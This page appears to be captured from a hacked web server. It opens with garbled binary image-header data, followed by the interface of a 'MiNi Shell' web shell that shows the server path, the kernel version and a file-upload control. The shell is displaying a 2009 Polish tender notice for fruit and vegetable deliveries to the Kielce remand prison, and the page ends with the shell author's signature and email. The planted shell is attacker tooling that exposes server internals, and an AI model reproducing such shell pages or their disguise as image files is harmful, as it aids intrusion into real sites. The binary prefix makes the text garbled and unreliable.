JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090921/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090921/160969-N-2009.html

<p class="kh_header"><b>Kielce: sukcesywne dostawy warzyw, owoców świeżych i przetworzonych</b><br>
<b>Numer ogłoszenia: 160969 - 2009; data zamieszczenia: 21.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Zagnańska 155, 25-563 Kielce, woj. świętokrzyskie, tel. 041 3314091, faks 041 3314419.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> sukcesywne dostawy warzyw, owoców świeżych i przetworzonych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem zamówienia jest sukcesywna dostawa warzyw, owoców świeżych i przetworzonych według podziału na  części wymienione w pkt. 4 s.i.w.z..
3.2. Czas realizacji złożonego zamówienia - 3 dni robocze.
3.3. Dostawy należy realizować własnym transportem (na koszt dostawcy) w godz. od 7:00 do 13:00 w dniach poniedziałek - czwartek. Wykonawca zobowiązany jest powiadomić telefonicznie Zamawiającego o realizacji dostawy w danym dniu (uzgodnienie konkretnej godz. dostawy). Wraz z dostawą Zamawiający żąda faktury - (brak dokumentu faktury będzie skutkowało nieprzyjęciem towaru przez Zamawiającego).
3.4. W przypadku stwierdzenia jakichkolwiek wad jakościowych dostarczonych produktów Wykonawca jest zobowiązany do natychmiastowej wymiany danych produktów  i dostarczenia ich na własny koszt - w terminie 1-go dnia roboczego do godz. 13:00.
3.5. Niżej wymienione załączniki stanowią integralną część Specyfikacji Istotnych Warunków Zamówienia
1. załącznik nr 1 - (formularze ofertowe poszczególnych części) 
- Formularz ofertowy nr 1-1-1 - ziemniaki jadalne
- Formularz ofertowy nr 1-1-2 - warzywa świeże w I gatunku
Formularz ofertowy nr 1-1-3 - kiszonki
Formularz ofertowy nr 1-1-4 - owoce świeże
Formularz ofertowy nr 1-1-5 - owoce przetworzone
Formularz ofertowy nr 1-1-6 - warzywa przetworzone
2.Oświadczenie z art. 22 ust. 1 Pzp - nr 2
3. Oświadczenie z art. 24 ust. 1 i 2 Pzp - nr 3
4.załącznik nr 4 - umowa (załącznik nr 4-4-1, 4-4-2 - dotyczy części I i II) oraz
(załącznik nr 4-4 -3, 4-4-4, 4-4-5, 4-4-6 dotyczy części III, IV, V, VI) .
 1.Opis części zamówienia: 
4.1. Dopuszcza się składanie ofert częściowych.
4.2. Część I - Dostawa ziemniaków jadalnych zgodnie z Polską Normą (PN-75R-47450),w ilości 	- 230 000 kg.
Częstotliwość dostaw - nie częściej niż dwa razy w miesiącu, zgodnie z dyspozycją Zamawiającego. 
W części I - ej. - utrzymanie stałej ceny - 6 m-cy.  Umowa zostanie zawarta
od 28.10.2009r.  do 27.10.2010r.
Zmiana ceny dostaw w części pierwszej może nastąpić na Wniosek Zamawiającego lub Wykonawcy, potwierdzona podpisanym przez strony aneksem do umowy, jeden raz na 6 m-cy. . 
Po okresie niezmienności cen (6 m-cy) może nastąpić ich zmiana pod warunkiem że: 
cena po podwyżce dostarczanych produktów będzie  niższa o 20% od najniższej ceny hurtowej obowiązującej na Świętokrzyskim Rynku Hurtowym w Kielcach ul. Magazynowa 4. 
cena po obniżce dostarczanych produktów będzie  niższa o 20% od najwyższej ceny hurtowej obowiązującej na Świętokrzyskim Rynku Hurtowym w Kielcach ul. Magazynowa 4. 
Wykonawca zobowiązuje się powiadomić Zamawiającego o zmianie ceny z wyprzedzeniem co najmniej 10 dni roboczych.
Wraz z aneksem o podniesienie cen Wykonawca jest zobowiązany przedstawić aktualny cennik obowiązujący  na Świętokrzyskim Rynku Hurtowym w Kielcach ul. Magazynowa 4.
Zamówiony towar nie może wykazywać oznak nieświeżości lub zepsucia, musi być świeży o dobrym smaku. 
4.3. Część II - Dostawa warzyw w I gatunku oraz ilościach nw:
- pietruszka korzeń PN-R-75370 - 20 000 kg,
- por PNR-91R-75368 - 5 000 kg,
- seler PNR-729137-24 - 15 000 kg,
- burak ćwikłowy PN-R-72R-75360 - 25 000 kg,
- marchew PN-84R-75358 - 35 000 kg,
- cebula PN-87R-75357		- 15 000 kg,
- kapusta biała (kamienna głowa) PN-72R-75362 - 13 000 kg,
- kapusta czerwona PN-72R-75362 - 7 000 kg,
- fasola JAŚ - 3 000 kg,
- groch łuskany suszony - 3 000 kg,
- pomidor - 8 000 kg,
- kalafior - 3 000 kg,
- ogórek świeży - 7 000 kg.
Dostawa ww warzyw - nie częściej niż 1 raz w tygodniu. Dostawa produktów       tj. ogórek świeży, pomidor, kalafior - w okresie wegetacji gruntowej. 
W części II - ej. - utrzymanie stałej ceny - 6 m-cy.  Umowa zostanie zawarta
od 28.10.2009r.  do 27.10.2010r.
Zmiana ceny dostaw w części pierwszej może nastąpić na Wniosek Zamawiającego lub
Wykonawcy, potwierdzona podpisanym przez strony aneksem do umowy, jeden raz               na 6 m-cy. . 
Po okresie niezmienności cen (6 m -cy) może nastąpić ich zmiana pod warunkiem że: 
cena po podwyżce dostarczanych produktów będzie  niższa o 20% od najniższej ceny hurtowej obowiązującej na Świętokrzyskim Rynku Hurtowym w Kielcach ul. Magazynowa 4. 
cena po obniżce dostarczanych produktów będzie  niższa o 20% od najwyższej ceny hurtowej obowiązującej na Świętokrzyskim Rynku Hurtowym w Kielcach ul. Magazynowa 4. 
Wykonawca zobowiązuje się powiadomić Zamawiającego o zmianie ceny z wyprzedzeniem co najmniej 10 dni roboczych.
Wraz z aneksem o podniesienie cen Wykonawca jest zobowiązany przedstawić aktualny cennik obowiązujący  na Świętokrzyskim Rynku Hurtowym w Kielcach ul. Magazynowa 4.
- Zamówiony towar nie może wykazywać oznak nieświeżości lub zepsucia, musi być świeży             o dobrym smaku. 
4.4. Część III - Dostawa kiszonek. 
- kapusta kiszona PN-72-A-777000- 20 000 kg,
  opakowania: wiadra, beczki 3 - 120 kg
ogórki kiszone PN-70A-77701- 15 000 kg.
  opakowania: wiadra, beczki 3 - 120 kg
Dostawa ww warzyw przetworzonych - nie częściej niż 1 raz na dwa tygodnie. 
W części III - ej. - utrzymanie stałej ceny 12 - m-cy.  Umowa zostanie zawarta
od 28.10.2009r.  do 27.10.2010r.
- Zamówiony towar musi być ułożony w opakowaniu w sposób nie powodujący deformacji oraz zapobiegający utracie walorów smakowych i odżywczych. Artykuły nie mogą wykazywać oznak nieświeżości lub zepsucia, mają być świeże o dobrym smaku. 
4.5. Część IV - Dostawa owoców. 
- jabłka 	- 17 000 kg,
pieczarki 	- 3 000 kg.
Dostawa ww owoców - nie częściej niż 1 raz w tygodniu. 
W części IV - ej. - utrzymanie stałej ceny 12 - m-cy.  Umowa zostanie zawarta
od 28.10.2009r.  do 27.10.2010r.
- Zamówiony towar musi być ułożony w opakowaniu w sposób nie powodujący deformacji oraz zapobiegający utracie walorów smakowych i odżywczych. Artykuły nie mogą wykazywać oznak nieświeżości lub zepsucia, mają być świeże o dobrym smaku. 	       
4.6. Część V - Dostawa owoców przetworzonych.
- dżem	(opakowania 1 - 20 kg)	- 4 000 kg,
np. (truskawkowy, wiśniowy, morelowy, brzoskwiniowy - nie wieloowocowy).	
- marmolada (opakowania 1 - 20 kg) 	- 4 000 kg,
powidła  (opakowania 1 - 20 kg) 	- 3 000 kg.
Dostawa owoców przetworzonych - nie częściej niż 1 raz w  miesiącu. 
W części V - ej. - utrzymanie stałej ceny 12 - m-cy.  Umowa zostanie zawarta
od 28.10.2009r.  do 27.10.2010r.
- Zamówiony towar musi być ułożony w opakowaniu w sposób nie powodujący deformacji oraz zapobiegający utracie walorów smakowych i odżywczych. Artykuły nie mogą wykazywać oznak nieświeżości lub zepsucia, mają być świeże o dobrym smaku. Jednocześnie na każdym dostarczonym dostarczonym produkcie musi być etykieta, która posiada nadrukowaną informację o nazwie środka spożywczego (skład), nazwie i adresie producenta, dacie przydatności do spożycia, warunkach przechowywania oraz wadze. Towar musi spełniać wymogi Polskiej Normy.
4.7. Część VI - Dostawa warzyw przetworzonych. 
- leczo pieczarkowe	(opakowania 3 - 10 kg) - 3 500 kg,
- koncentrat pomidorowy (opakowania 3 - 10 kg ) - 2 000 kg,
- groszek konserwowy (opakowania 400g - 3 kg) - 700 kg,
kukurydza konserwowa (opakowania 400g - 3 kg) - 300 kg.
Dostawa warzyw przetworzonych - nie częściej niż 1 raz w miesiącu.
W części VI - ej. - utrzymanie stałej ceny 12 - m-cy.  Umowa zostanie zawarta
od 28.10.2009r.  do 27.10.2010r. 
- Zamówiony towar musi być ułożony w opakowaniu w sposób nie powodujący deformacji oraz zapobiegający utracie walorów smakowych i odżywczych. Artykuły nie mogą wykazywać oznak nieświeżości lub zepsucia, mają być świeże o dobrym smaku. Jednocześnie na każdym dostarczonym dostarczonym produkcie musi być etykieta, która posiada nadrukowaną informację o nazwie środka spożywczego (skład), nazwie i adresie producenta, dacie przydatności do spożycia, warunkach przechowywania oraz wadze. Towar musi spełniać wymogi Polskiej Normy.
 2.Informacje o przewidywanych zamówieniach uzupełniających:
5.1. Zamawiający nie przewiduje udzielić zamówień uzupełniających. 
 3.Opis sposobu przedstawienia ofert wariantowych:
6.1. Zamawiający nie dopuszcza składania ofert wariantowych.
 4.Termin wykonania zamówienia:
7.1.Termin wykonania zamówienia: 12 miesięcy od daty podpisania umowy (t.j. od 28.10.2009r.  do 27.10.2010r.)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1, 03.21.12.00-5, 03.22.10.00-6, 03.22.11.13-1, 03.22.11.20-3, 03.22.11.12-4, 03.22.14.00-0, 03.22.14.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział podmioty nie wykluczone z ubiegania się o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień Publicznych oraz spełniające warunki art. 22 ust. 1 ww ustawy i wymogi określone w Specyfikacji Istotnych Warunków Zamówienia.
- Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> -Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie                       do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wydane nie wcześniej niż                     6 miesięcy przed upływem terminu składania ofert.
-Aktualne zaświadczenie o nie zaleganiu w płatnościach we właściwym Urzędzie Skarbowym oraz właściwym Zakładzie Ubezpieczeń Społecznych lub Kasie Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega                   z opłacaniem podatków, oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
- Oświadczenie o spełnieniu warunków określonych w w art. 22 ust. 1 Prawa zamówień publicznych (załącznik nr 2).
- Oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawa zamówień publicznych (załącznik nr 3).
9.5. Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają  z przepisów prawa lub innych dokumentów rejestrowych (wykaz osób uprawnionych         do reprezentowania wykonawcy i składania oświadczeń woli).
9.6. Oświadczenie akceptacji utrzymania stałej ceny przez okres 6 - ciu miesięcy w części   I - ej - i II - ej.
9.7. Oświadczenie akceptacji utrzymania stałej ceny przez okres 12 - tu miesięcy w części III - ej - , IV - ej, V - ej i VI - ej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy 
ul. zagnańska 155
25-563 Kielce.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2009 godzina 10:00, miejsce: Areszt Śledczy 
ul. zagnańska 155
25-563 Kielce
Sekretariat - I piętro budynku adminstracji.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ziemniaki jadalne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 4.Część I - Dostawa ziemniaków jadalnych zgodnie z Polską Normą (PN-75R-47450),
w ilości 	- 230 000 kg.
Częstotliwość dostaw - nie częściej niż dwa razy w miesiącu, zgodnie z dyspozycją Zamawiającego. 
W części I - ej. - utrzymanie stałej ceny - 6 m-cy.  Umowa zostanie zawarta
od 28.10.2009r.  do 27.10.2010r.
Zmiana ceny dostaw w części pierwszej może nastąpić na Wniosek Zamawiającego lub
Wykonawcy, potwierdzona podpisanym przez strony aneksem do umowy, jeden raz          na 6 m-cy. . 
Po okresie niezmienności cen (6 m-cy) może nastąpić ich zmiana pod warunkiem że: 
cena po podwyżce dostarczanych produktów będzie  niższa o 20% od najniższej ceny hurtowej obowiązującej na Świętokrzyskim Rynku Hurtowym w Kielcach ul. Magazynowa 4. 
cena po obniżce dostarczanych produktów będzie  niższa o 20% od najwyższej ceny hurtowej obowiązującej na Świętokrzyskim Rynku Hurtowym w Kielcach ul. Magazynowa 4. 
Wykonawca zobowiązuje się powiadomić Zamawiającego o zmianie ceny z wyprzedzeniem co najmniej 10 dni roboczych.
Wraz z aneksem o podniesienie cen Wykonawca jest zobowiązany przedstawić aktualny cennik obowiązujący  na Świętokrzyskim Rynku Hurtowym w Kielcach ul. Magazynowa 4.
Zamówiony towar nie może wykazywać oznak nieświeżości lub zepsucia, musi być świeży             o dobrym smaku..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warzywa świeże w I gatunku.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - pietruszka korzeń PN-R-75370			- 20 000 kg,
- por PN/R-91R-75368				- 5 000 kg,
- seler PNR-729137-24				- 15 000 kg,
- burak ćwikłowy PN-R-72R-75360			- 25 000 kg,
- marchew PN-84R-75358	 			- 35 000 kg,
- cebula PN-87R-75357				- 15 000 kg,
- kapusta biała (kamienna głowa) PN-72R-75362	- 13 000 kg,
- kapusta czerwona PN-72R-75362			- 7 000 kg,
- fasola JAŚ 					- 3 000 kg,
- groch łuskany suszony 				- 3 000 kg,
- pomidor 					- 8 000 kg,
- kalafior 					- 3 000 kg,
- ogórek świeży 					- 7 000 kg.
Dostawa ww warzyw - nie częściej niż 1 raz w tygodniu. Dostawa produktów                     tj. ogórek świeży, pomidor, kalafior - w okresie wegetacji gruntowej. 
W części II - ej. - utrzymanie stałej ceny - 6 m-cy.  Umowa zostanie zawarta
od 28.10.2009r.  do 27.10.2010r.
Zmiana ceny dostaw w części pierwszej może nastąpić na Wniosek Zamawiającego lub
Wykonawcy, potwierdzona podpisanym przez strony aneksem do umowy, jeden raz               na 6 m-cy. . 
Po okresie niezmienności cen (6 m -cy) może nastąpić ich zmiana pod warunkiem że: 
cena po podwyżce dostarczanych produktów będzie  niższa o 20% od najniższej ceny hurtowej obowiązującej na Świętokrzyskim Rynku Hurtowym w Kielcach ul. Magazynowa 4. 
cena po obniżce dostarczanych produktów będzie  niższa o 20% od najwyższej ceny hurtowej obowiązującej na Świętokrzyskim Rynku Hurtowym w Kielcach ul. Magazynowa 4. 
Wykonawca zobowiązuje się powiadomić Zamawiającego o zmianie ceny z wyprzedzeniem co najmniej 10 dni roboczych.
Wraz z aneksem o podniesienie cen Wykonawca jest zobowiązany przedstawić aktualny cennik obowiązujący  na Świętokrzyskim Rynku Hurtowym w Kielcach ul. Magazynowa 4.
- Zamówiony towar nie może wykazywać oznak nieświeżości lub zepsucia, musi być świeży             o dobrym smaku..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa kiszonek.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - kapusta kiszona PN-72-A-777000	- 20 000 kg,
  opakowania: wiadra, beczki 3 - 120 kg
ogórki kiszone PN-70A-77701	- 15 000 kg.
  opakowania: wiadra, beczki 3 - 120 kg
Dostawa ww warzyw przetworzonych - nie częściej niż 1 raz na dwa tygodnie. 
W części III - ej. - utrzymanie stałej ceny 12 - m-cy.  Umowa zostanie zawarta
od 28.10.2009r.  do 27.10.2010r.
- Zamówiony towar musi być ułożony w opakowaniu w sposób nie powodujący deformacji oraz zapobiegający utracie walorów smakowych i odżywczych. Artykuły nie mogą wykazywać oznak nieświeżości lub zepsucia, mają być świeże o dobrym smaku..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.14.10-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> dostawa owoców.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - jabłka - 17 000 kg,
pieczarki - 3 000 kg.
Dostawa ww owoców - nie częściej niż 1 raz w tygodniu. 
W części IV - ej. - utrzymanie stałej ceny 12 - m-cy.  Umowa zostanie zawarta
od 28.10.2009r.  do 27.10.2010r.
- Zamówiony towar musi być ułożony w opakowaniu w sposób nie powodujący deformacji oraz zapobiegający utracie walorów smakowych i odżywczych. Artykuły nie mogą wykazywać oznak nieświeżości lub zepsucia, mają być świeże o dobrym smaku..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.20.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> dostawa owoców przetworzonych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - dżem	(opakowania 1 - 20 kg) 		- 4 000 kg,
np. (truskawkowy, wiśniowy, morelowy, brzoskwiniowy - nie wieloowocowy).	
- marmolada (opakowania 1 - 20 kg) 		- 4 000 kg,
powidła  (opakowania 1 - 20 kg) 		- 3 000 kg.
Dostawa owoców przetworzonych - nie częściej niż 1 raz w  miesiącu. 
W części V - ej. - utrzymanie stałej ceny 12 - m-cy.  Umowa zostanie zawarta
od 28.10.2009r.  do 27.10.2010r.
- Zamówiony towar musi być ułożony w opakowaniu w sposób nie powodujący deformacji oraz zapobiegający utracie walorów smakowych i odżywczych. Artykuły nie mogą wykazywać oznak nieświeżości lub zepsucia, mają być świeże o dobrym smaku. Jednocześnie na każdym dostarczonym dostarczonym produkcie musi być etykieta, która posiada nadrukowaną informację o nazwie środka spożywczego (skład), nazwie i adresie producenta, dacie przydatności do spożycia, warunkach przechowywania oraz wadze. Towar musi spełniać wymogi Polskiej Normy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> dostawa warzyw przetworzonych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - leczo pieczarkowe	(opakowania 3 - 10 kg) - 3 500 kg,
- koncentrat pomidorowy (opakowania 3 - 10 kg ) - 2 000 kg,
- groszek konserwowy (opakowania 400g - 3 kg) - 700 kg,
kukurydza konserwowa (opakowania 400g - 3 kg) - 300 kg.
Dostawa warzyw przetworzonych - nie częściej niż 1 raz w miesiącu.
W części VI - ej. - utrzymanie stałej ceny 12 - m-cy.  Umowa zostanie zawarta
od 28.10.2009r.  do 27.10.2010r. 
- Zamówiony towar musi być ułożony w opakowaniu w sposób nie powodujący deformacji oraz zapobiegający utracie walorów smakowych i odżywczych. Artykuły nie mogą wykazywać oznak nieświeżości lub zepsucia, mają być świeże o dobrym smaku. Jednocześnie na każdym dostarczonym dostarczonym produkcie musi być etykieta, która posiada nadrukowaną informację o nazwie środka spożywczego (skład), nazwie i adresie producenta, dacie przydatności do spożycia, warunkach przechowywania oraz wadze. Towar musi spełniać wymogi Polskiej Normy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com